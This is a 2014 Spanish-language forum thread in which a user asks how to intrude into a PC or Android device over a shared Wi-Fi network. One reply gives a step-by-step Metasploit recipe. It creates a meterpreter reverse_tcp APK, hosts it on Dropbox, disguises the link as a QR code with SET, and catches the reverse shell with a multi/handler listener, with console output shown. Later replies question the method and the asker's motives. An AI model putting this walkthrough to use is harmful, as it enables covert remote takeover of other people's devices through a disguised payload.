¿Como hago una intrusion a pc desde android? (estando en red)

Iniciado por mhcruz, 8 Febrero 2014, 15:34 PM

0 Miembros y 1 Visitante están viendo este tema.

mhcruz

Hola a todos, me interesaria saber como hacer una intrusion a pc desde android estando conectado por wifi a la misma red, e estado mirando y no encuentro informacion util. Tambien me interesa hacer intrusion de android a android estando conectado en la misma red.

El que me pueda contestar se lo agradeco, Un saludo a todos, Y adios  ;D

engel lex

resumo en...

-tienes que colocar algún virus en los dispositivos que vas a ingresar
-tienes que tener un manejardor para ese virus instalado en el dispositivo de control

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

mhcruz

xD cuando digo intrusion es como enviar ese virus de forma oculta y remota

engel lex

no, no es tan simple, tienes que buscar alguna vulnerabilidad en un servicio corriendo entenderla y aprovecharte de ella... ese tipo de intrusion no es facil ni mucho menos, tienes que aprender muchisimo antes
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

xXCalaveraXx

Muy facil con Metasploit y un pc con Ubuntu o una distribucion de linux
root@kali:~# msfupdate
2)Ahora vamos a crear el payload en forma de aplicación apk:
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.39 R > /root/prueba.apk
En lhost debemos poner la ip de nuestra interfaz, si no sabemos cual es nuestra ip en ese momento ejecutamos ifconfig y nos aparecerá. Después le indicamos que lo cree en la ruta /root/ (carpeta personal) y que cree un archivo llamado prueba.apk
3)Para hacerlo mas realista subiremos dicho archivo a dropbox por ejemplo, para generar un link de descarga, en mi caso:
https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
4) Ahora lo camuflaremos en un codigo QR escaneable para ello usaremos SET de la siguiente forma:
root@kali:~# se-toolkit
set>1
set>9
Enter the URL you want the QRCode to go to:https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
Ahora SET nos dice lo siguiente:
  • QRCode has been generated under /root/.set/reports/qrcode_attack.png
    Este será el codigo QR el cual al ser escaneado por un dispositivo Android descarga la aplicación prueba.apk
    5)Ahora nos pondremos a la escucha para cuando alguien pique:
    root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
    6)En este caso por ser una prueba local usé mi propio teléfono, al abrir la instalación, en la terminal que abrimos en el paso 5, se nos abrirá una sesión de meterpreter con la cual ya podremos jugar a nuestro antojo.

    root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
  • Initializing modules...
    PAYLOAD => android/meterpreter/reverse_tcp
    LHOST => 0.0.0.0
  • Started reverse handler on 0.0.0.0:4444
  • Starting the payload handler...
  • Sending stage (39698 bytes) to 192.168.1.37
  • Meterpreter session 1 opened (192.168.1.39:4444 -> 192.168.1.37:52818) at 2013-08-25 14:31:44 +0200
    meterpreter > shell
    y ya estaremos en la maquina con android en una red local :)

engel lex

xXCalaveraXx

yo dije
Cita de: engelx en  8 Febrero 2014, 17:51 PM
resumo en...

-tienes que colocar algún virus en los dispositivos que vas a ingresar
-tienes que tener un manejardor para ese virus instalado en el dispositivo de control

el dijo
Cita de: mhcruz en  9 Febrero 2014, 06:27 AM
xD cuando digo intrusion es como enviar ese virus de forma oculta y remota

tu método es lo mismo que yo dije, solo que con pasos puntuales... el había pedido descartar eso... crear un .apk, instalar en el dispositivo... sin contar que lo estás haciendo desde linux a android y no al contrario como quiere el... aunque sea leíste lo que se dijo? -.-
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

beholdthe

#6
Sin hablar que la inmensa mayoría de usuarios, no tienen activada la opción para poder instalar "Fuentes desconocidas", por lo que veo poco probable que así pueda hacer algo.

P.D: Este post no me huele demasiado bien...